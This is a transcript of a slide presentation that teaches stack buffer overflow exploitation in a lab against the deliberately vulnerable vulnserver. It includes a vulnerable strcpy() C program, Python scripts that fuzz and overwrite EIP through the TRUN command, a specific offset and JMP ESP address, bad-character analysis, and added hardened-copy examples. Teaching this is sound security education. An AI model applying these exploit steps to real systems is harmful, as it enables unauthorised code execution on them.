Exploiting buffer overflows

Post on 16-Jul-2015

Transcript of Exploiting buffer overflows

Disclaimer

@cyberkryption

The views expressed within this presentation or afterwards are my own and in no way represent my employer.

The following presentation describes how to conduct a buffer overflow attack.

These attacks are illegal to perform against systems that you do not have explicit permission to test.

I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.

Caveat: With knowledge comes responsibility

Who am I

@cyberkryption

Who is This?

Von Neumann Explained

Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec

Phrack 49

Meet the Stack

Each program has its own stack as a memory structure.

Program data such as variables are also saved there.

Data is 'pushed' on to the stack and 'popped' off the stack

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

A Vulnerable 'C' program

#include <stdio.h>
#include <string.h>   /* needed for strcpy() */

int main(int argc, char *argv[])
{
    char buff[20];                 /* 20-byte buffer reserved on the stack */
    if (argc < 2)                  /* avoid dereferencing a missing argument */
        return 1;
    printf("copying into buffer");
    strcpy(buff, argv[1]);         /* unbounded copy: overflows when argv[1] is 20 bytes or more */
    return 0;
}

We define a character array of 20 bytes, which reserves that space on the stack.

We copy into the buffer with strcpy() without checking the size of the input.

If we pass more than the buffer size (20 bytes) we get a buffer overflow!!!
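Added example, not code from the slides: the same unbounded strcpy() next to a bounded copy that refuses input which would not fit, so the 20-byte buffer can never be overrun. BUFF_SIZE, copy_checked() and accepts() are names chosen here.

```c
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 20

/* The slide's pattern: strcpy() trusts the caller's length, so any argument
 * of BUFF_SIZE bytes or more runs past buff[] into the saved frame data. */
void copy_unchecked(char *buff, const char *input)
{
    strcpy(buff, input);             /* no bound: overflow when strlen(input) >= BUFF_SIZE */
}

/* Hardened form: measure first, then copy only when the string and its
 * terminating NUL fit.  Returns 0 on success, -1 when the input is rejected. */
int copy_checked(char *buff, size_t buff_size, const char *input)
{
    size_t len = strlen(input);
    if (len >= buff_size)            /* need one byte of room for the NUL */
        return -1;
    memcpy(buff, input, len + 1);    /* bounded copy, NUL included */
    return 0;
}

/* Convenience wrapper: would this input be accepted into a BUFF_SIZE buffer? */
int accepts(const char *input)
{
    char buff[BUFF_SIZE];
    return copy_checked(buff, sizeof buff, input);
}

int main(int argc, char *argv[])
{
    char buff[BUFF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_checked(buff, sizeof buff, argv[1]) != 0) {
        fprintf(stderr, "rejected: %zu bytes does not fit a %d-byte buffer\n",
                strlen(argv[1]), BUFF_SIZE);
        return 1;
    }
    printf("copied safely: %s\n", buff);
    return 0;
}
```

Building with -fstack-protector-strong adds a canary that turns the unchecked overflow into an abort instead of an EIP overwrite, but the length check is the actual fix.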

Stack Overwrite

Data on the stack is overwritten.

Extra input overwrites other data in the stack

Eventually the instruction pointer is overwritten and we have control!!!

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Meet the CPU Registers & Pointers

CPU Pointers
EIP = Instruction Pointer, points to the address of the next instruction to be executed
ESP = Stack Pointer, points to the top of the stack
EBP = Base Pointer, points to the base of the current stack frame

If we can overwrite EIP we can control the execution flow; otherwise it's only a DoS exploit.

CPU Registers
EAX = Accumulator
EBX = Base Register
ECX = Counter Register
EDX = Data Register

Meet vulnserver

Initial Fuzzing

#!/usr/bin/python
# Python 2 script (print statement, raw_input)
import socket

server = '192.168.1.65'
port = 9999
length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print s.recv(1024)                        # banner from vulnserver
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length                     # filler of the requested length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

Initial Fuzzing - Video

Initial Crash - Video

Path to Victory

● Determine buffer length. Any register pointing to buffer? -> 'A' * 3000 / ESP = buffer
● Locate EIP overwrite offset in buffer. Enough space for shellcode? -> (not yet known)
● Determine JMP ESP location? -> (not yet known)
● Resolve any bad characters -> (not yet known)

EIP Hunting

#!/usr/bin/python
# Python 2 script
import socket

server = '192.168.1.65'
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print s.recv(1024)                        # banner from vulnserver
print "Sending Evil Buffer to TRUN ."
attack = " < insert cyclic pattern here> "   # output of pattern_create.rb goes here
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

EIP Hunting – Cyclic Pattern Crash

How to Locate EIP Overwrite

● After the crash with the cyclic pattern, we find the characters 396F4348 overwriting the EIP register

● Metasploit's pattern_create.rb creates a cyclic pattern of 3000 non-repeating characters.

● Lastly, use pattern_offset.rb to find the offset of the EIP overwrite within the pattern

● Use convert.sh for HEX to ASCII conversion

Locating EIP Offset - Video

EIP Hunting Part II

#!/usr/bin/python
# Python 2 script
import socket

server = '192.168.1.65'
sport = 9999

prefix = 'A' * 2006                       # filler up to the EIP overwrite offset
eip = 'BBBB'                              # the 4 bytes expected to land in EIP (42424242)
padding = 'F' * (3000 - 2006 - 4)         # keeps the total length at 3000 bytes
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))
print s.recv(1024)
print "Sending Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

EIP & Buffer Space Confirmed

Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes

Path to Victory

● Determine buffer length. Any register pointing to buffer? -> 'A' * 3000 / ESP = buffer
● Locate EIP overwrite offset in buffer. Enough space for shellcode? -> EIP overwrite (4 bytes) at offset 2006, then 980 bytes of room for shellcode
● Determine JMP ESP location? -> (not yet known)
● Resolve any bad characters -> (not yet known)

Buffer construction: 'A' * 2006 | EIP overwrite | Shellcode

Determining JMP ESP Memory Location

Path to Victory

● Determine buffer length. Any register pointing to buffer? -> 'A' * 3000 / ESP = buffer
● Locate EIP overwrite offset in buffer. Enough space for shellcode? -> EIP overwrite (4 bytes) at offset 2006, then 980 bytes of room for shellcode
● Determine JMP ESP location? -> 625011AF in essfunc.dll
● Resolve any bad characters -> (not yet known)

Buffer construction: 'A' * 2006 | EIP overwrite | Shellcode

The Bad Character Problem

Hex   Dec  Description
---   ---  ---------------------------------------------
0x00  0    Null byte, terminates a C string
0x0A  10   Line feed, may terminate a command line
0x0D  13   Carriage return, may terminate a command line
0x20  32   Space, may terminate a command line argument

Bad characters break our code when it is executed on the stack; for example, 0x00 will stop our code executing!!
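Added example, not from the slides: why 0x00 is the first bad character. A target that stores its input with strcpy(), like the vulnerable program earlier, drops everything after the first NUL; first_mismatch(), build_probe(), delivered_via_strcpy() and lost_index_with_nul_at() are helpers constructed here to show exactly where the copy stops.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Compare the bytes that were sent with the bytes found in memory afterwards.
 * Returns the index of the first byte that did not arrive intact, or n when
 * every byte survived.  With a real crash dump, `seen` is what you read back. */
size_t first_mismatch(const unsigned char *sent, const unsigned char *seen, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (sent[i] != seen[i])
            return i;
    return n;
}

/* Fill `out` (at least 256 bytes) with the classic probe 0x01..0xFF plus a
 * terminating NUL so it can be passed to C-string functions; returns 255. */
size_t build_probe(unsigned char *out)
{
    for (int b = 1; b <= 0xFF; b++)
        out[b - 1] = (unsigned char)b;
    out[255] = 0;
    return 255;
}

/* Model a target that stores input with strcpy(): everything after the first
 * 0x00 is never copied.  Returns the index of the first byte that was lost. */
size_t delivered_via_strcpy(const unsigned char *payload, size_t n)
{
    unsigned char dest[512];
    memset(dest, 0xFF, sizeof dest);               /* sentinel: lost bytes show as 0xFF */
    strcpy((char *)dest, (const char *)payload);   /* stops at the first NUL */
    return first_mismatch(payload, dest, n);
}

/* Drop a 0x00 into the probe at `pos` and report where delivery stops.
 * The NUL itself is written by strcpy, so the first lost byte is pos + 1. */
size_t lost_index_with_nul_at(size_t pos)
{
    unsigned char probe[256];
    size_t n = build_probe(probe);
    probe[pos] = 0x00;
    return delivered_via_strcpy(probe, n);
}

int main(void)
{
    unsigned char probe[256];
    size_t n = build_probe(probe);
    printf("probe without 0x00: %zu of %zu bytes arrived\n", delivered_via_strcpy(probe, n), n);
    size_t lost = lost_index_with_nul_at(4);
    printf("probe with 0x00 at index 4: first lost byte at index %zu\n", lost);
    return 0;
}
```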

Determining Bad Characters

Path to Victory

● Determine buffer length. Any register pointing to buffer? -> 'A' * 3000 / ESP = buffer
● Locate EIP overwrite offset in buffer. Enough space for shellcode? -> EIP overwrite (4 bytes) at offset 2006, then 980 bytes of room for shellcode
● Determine JMP ESP location? -> 625011AF in essfunc.dll
● Resolve any bad characters -> 0x00

Buffer construction: 'A' * 2006 | EIP overwrite | Shellcode

Let's Create some Shellcode

Final Buffer Structure & Operation

Buffer layout: 'A' * 2006 | EIP overwrite = 625011AF (JMP ESP) | NOP sled | Shellcode

● Buffer overflow starts here
● Execution goes to 625011AF
● JMP ESP at 625011AF redirects into the NOP sled
● Shellcode runs

\xCC breakpoint (INT3) placed where the shellcode goes -> Breakpoint activated, confirming execution reaches the payload

Putting it all together

CVE2012-5958 /5959

Questions ????

TWITTER: @cyberkryption

BLOG: cyberkryption.wordpress.com